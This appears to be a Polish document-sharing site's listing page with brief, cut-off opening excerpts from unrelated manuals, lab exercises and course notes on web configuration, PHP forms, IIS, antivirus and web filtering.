Przewodnik użytkownika (instrukcja) AutoMagicTest 0.2.3.195 Spis treści 1. Wprowadzenie... 2 2. Instalacja i uruchomienie... 2 3. Proces automatycznej analizy strony... 3 4. Opcje zaawansowane... 6 4.1
Bardziej szczegółowo3S TeleCloud - Aplikacje Instrukcja użytkowania usługi 3S TELEFON UŻYTKOWNIK
\ 3S TeleCloud - Aplikacje Instrukcja użytkowania usługi 3S TELEFON UŻYTKOWNIK SPIS TREŚCI 1. LOGOWANIE DO APLIKACJI...3 2. WYGLĄD OKNA...4 3. PROGRAMOWANIE...5 3.1. INSTRUKCJA PROGRAMOWANIA PRZYCISKÓW...6
Bardziej szczegółowoInstrukcja obsługi Pakietu Bezpieczeństwa UPC (ios)
Instrukcja obsługi Pakietu Bezpieczeństwa UPC (ios) 1 Wymagania sprzętowe Pakiet Bezpieczeństwa UPC współpracuje z urządzeniami z systemem ios 9 lub wyższym. Instalacja wymaga 10 MB wolnego miejsca w pamięci
Bardziej szczegółowoKONFIGURACJA PRZEGLĄDAREK. Poniższa konfiguracja dedykowana jest dla Bankowości Internetowej SGB
KONFIGURACJA PRZEGLĄDAREK Poniższa konfiguracja dedykowana jest dla Bankowości Internetowej SGB Spis treści Konfiguracja przeglądarki Internet Explorer 8.0... 2 Konfiguracja przeglądarki Internet Explorer
Bardziej szczegółowoJęzyki programowania wysokiego poziomu. Ćwiczenia
Języki programowania wysokiego poziomu Ćwiczenia Języki programowania Ćwiczenia Strukturalny HTML Arkusze CSS Formularze HTML i PHP Baza danych MySQL Forum internetowe Strukturalny HTML Zadania Dokument
Bardziej szczegółowoInstrukcja składania wniosku o dofinansowanie w systemie informatycznym IP na potrzeby konkursu nr 1/4.1.4/2015
Instrukcja składania wniosku o dofinansowanie w systemie informatycznym IP na potrzeby konkursu nr 1/4.1.4/2015 INFORMACJE OGÓLNE 1. Wnioski o dofinansowanie projektu w ramach konkursu nr 1/4.1.4/2015
Bardziej szczegółowoInstrukcja dla usługi ModeView
Instrukcja dla usługi ModeView Spis treści 1. Aplikacja Easy Photo... 2 1.1. Sprawdzenie komunikacji z usługą internetowa ModeView... 2 1.1.1. Brak autoryzacji... 2 1.1.2. Usługa dostępna... 2 1.2. Wysyłanie
Bardziej szczegółowoDokumentacja Skryptu Mapy ver.1.1
Dokumentacja Skryptu Mapy ver.1.1 2 Dokumentacja Skryptu Mapy ver.1.1 Spis treści Dokumentacja skryptu... 3 Dodatkowe informacje i kontakt... 7 3 Dokumentacja Skryptu Mapy ver.1.1 Dokumentacja skryptu
Bardziej szczegółowoJęzyki programowania wysokiego poziomu. PHP cz.3. Formularze
Języki programowania wysokiego poziomu PHP cz.3. Formularze Formularze Sposób przesyłania danych formularza do serwera zależy od wybranej metody HTTP: Metoda GET
Bardziej szczegółowoSieci Komputerowe i Bazy Danych
Sieci Komputerowe i Bazy Danych Laboratorium 04 Badanie Protokołów WWW Klaudia Hyjek IMT, rok III, L02 Data wykonania: 27.03.2019r. 1. Wyszukać w zasobach sieci dokumenty [RFC 1945] oraz [RFC 2616]. Zapoznać
Bardziej szczegółowoPodsumowanie. Uwaga. Przygotowanie
Product: Cameras, NVRs, DVRs Page: 1 of 17 Podsumowanie Hik-Connect to nowa usługa wprowadzona przez Hikvision, która łączy DDNS. i usługę powiadomień Push. Zapewnia również łatwy dostęp do urządzenia
Bardziej szczegółowoLinksys/Cisco SPA2102, SPA3102 Instrukcja Konfiguracji
Linksys/Cisco SPA2102, SPA3102 Instrukcja Konfiguracji 1. Logowanie się do systemu ipfon24 Aby zalogować się do systemu należy wejść na https://ipfon24.ipfon.pl i zalogować się podające login wybrany podczas
Bardziej szczegółowoPolityka prywatności Spółdzielni Mieszkaniowej Słoneczny Stok
Polityka prywatności Spółdzielni Mieszkaniowej Słoneczny Stok Spółdzielnia Mieszkaniowa Słoneczny Stok szanuje prawo do prywatności Użytkowników serwisu sm-slonecznystok.pl. W szczególności dba o ochronę
Bardziej szczegółowoWydział Informatyki, Elektroniki i Telekomunikacji Katedra Telekomunikacji
Wydział Informatyki, Elektroniki i Telekomunikacji Katedra Telekomunikacji Bezpieczeństwo sieci teleinformatycznych Laboratorium 4 Temat: Filtracja Web. 1. Spis treści 2. Cel ćwiczenia... 3 3. Opis ćwiczenia...
Bardziej szczegółowoINSTRUKCJA UŻYTKOWNIKA
INSTRUKCJA UŻYTKOWNIKA INSTRUKCJA DLA KLIENTA Logowanie i resetowanie hasła Wersja 0.1 Marki, dn. 2018-02-21 Strona 2 z 7 Spis treści 1. CEL DOKUMENTU... 3 2. DEFINICJA NAZW I SKRÓTÓW... 3 3. SCENARIUSZ
Bardziej szczegółowoJarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne
Jarosław Kuchta Internetowe Usługi Informacyjne Komponenty IIS HTTP.SYS serwer HTTP zarządzanie połączeniami TCP/IP buforowanie odpowiedzi obsługa QoS (Quality of Service) obsługa plików dziennika IIS
Bardziej szczegółowoLaboratorium - Konfiguracja ustawień przeglądarki w Windows 7
5.0 5.3.2.7 Laboratorium - Konfiguracja ustawień przeglądarki w Windows 7 Wprowadzenie Wydrukuj i uzupełnij to laboratorium. W tym laboratorium, będziesz konfigurować ustawienia przeglądarki Microsoft
Bardziej szczegółowoPublikowanie strony WWW
Danuta ROZPŁOCH-NOWAKOWSKA Strona 1 2007-10-11 Moduł 2 (1. część) Publikowanie strony WWW Do publikowania stron WWW wykorzystywany był dotychczas w ramach zajęć wydziałowy serwer WWW. Kroki publikacji
Bardziej szczegółowoCYBEROAM Unified Treatment Management, Next Generation Firewall
CYBEROAM Unified Treatment Management, Next Generation Firewall Spis: 1. Cyberoam Technologies/portfolio 2. Funkcjonalności Cyberoam 3. Wyróżniki, przewagi na rynku 4. Interfejs i zarządzanie 5. Program
Bardziej szczegółowoBlokowanie stron internetowych
Blokowanie stron internetowych Jak to dobrze, Ŝe po trudnej rozmowie z klientem moŝna wrócić do oglądania nowo dodanych zdjęć z wakacji szkolnego kolegi, który umieścił je w serwisie społecznościowym.
Bardziej szczegółowoArcaVir 2008 System Protection
ArcaVir 2008 System Protection ARCAVIR 2008 SYSTEM PROTECTION to oprogramowanie typu Internet Security stanowiące pełne zabezpieczenie przed zagrożeniami z Internetu i sieci LAN. OCHRONA ANTYWIRUSOWA Silnik
Bardziej szczegółowoProgramowanie komponentowe. Przykład 1 Bezpieczeństwo wg The Java EE 5 Tutorial Autor: Zofia Kruczkiewicz
Programowanie komponentowe Przykład 1 Bezpieczeństwo wg The Java EE 5 Tutorial Autor: Zofia Kruczkiewicz Struktura wykładu 1. Utworzenie użytkowników i ról na serwerze aplikacji Sun Java System Application
Bardziej szczegółowoPRÓBNY EGZAMIN POTWIERDZAJĄCY KWALIFIKACJE W ZAWODZIE CZĘŚĆ PISEMNA
Nazwa kwalifikacji: Tworzenie aplikacji internetowych i baz danych oraz administrowanie bazami Oznaczenie kwalifikacji: E.14 Wersja arkusza: X Czas trwania egzaminu: 60 minut Etap pisemny Instrukcja dla
Bardziej szczegółowo